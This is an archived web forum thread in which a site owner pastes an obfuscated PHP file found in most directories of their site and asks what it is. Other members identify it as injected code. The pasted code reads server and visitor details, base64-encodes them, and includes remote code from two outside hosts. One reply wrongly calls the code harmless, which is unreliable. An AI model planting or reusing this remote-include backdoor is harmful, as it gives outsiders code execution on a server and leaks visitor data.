What is this?

Started by L.G.S, March 01, 2007, 02:06:47 PM

Previous topic - Next topic

L.G.S

In most of my folders I have a PHP file which has a few random numbers as the name and this as the content, and I have no idea where it comes from or what it does.

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5waHB0YWdzLndz")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("c2hvcC52bWFya2V0LmluZm8=")."/?".$str);} ?>

Anybody know?
FREE and LIVE World Cup + Premier League football streams:

www.gamesandgoals.com

winrules

I looks like you were hacked. I'd delete all those files immediately. Also check your .htaccess files.

winrules
SMF Developer

My Mods
Please do not PM me for support.

L.G.S

OK thanks... I haven't noticed any changes to anything though, those files have been there for a few weeks at least.

**** sake, the files are in almost every directory on my site, and I have loads of folders..

One of my htaccess is:

Options -MultiViews
ErrorDocument 404 //web/160355.php

My host did change the 404 error page recently to their own one (if i dont have mine customised) could this be it?

www.gamesandgoals.com

winrules

That's probablly an infected file. I'd delete it. If you have a backup from before it happened I'd restore it.

winrules
SMF Developer

My Mods
Please do not PM me for support.

L.G.S

infected file? Its in every directory :S

My host seem totally stupid about it, I emailed them and sent the info but they started going on about not worrying about their redirect page...

www.gamesandgoals.com

Sarke

Looks like it's meant to collect info about your server and the user and send it to either www3.phptags.ws or shop.vmarket.info

The code itself doesn't look to be dangerous, but the fact that someone put code on your server is.

My MODs          Please don't PM me for support, post in the appropriate topic.

L.G.S

turns out the problem was caused by permissions in SMF and the files were made by SMF, TP posted a solution

www.gamesandgoals.com

Advertisement: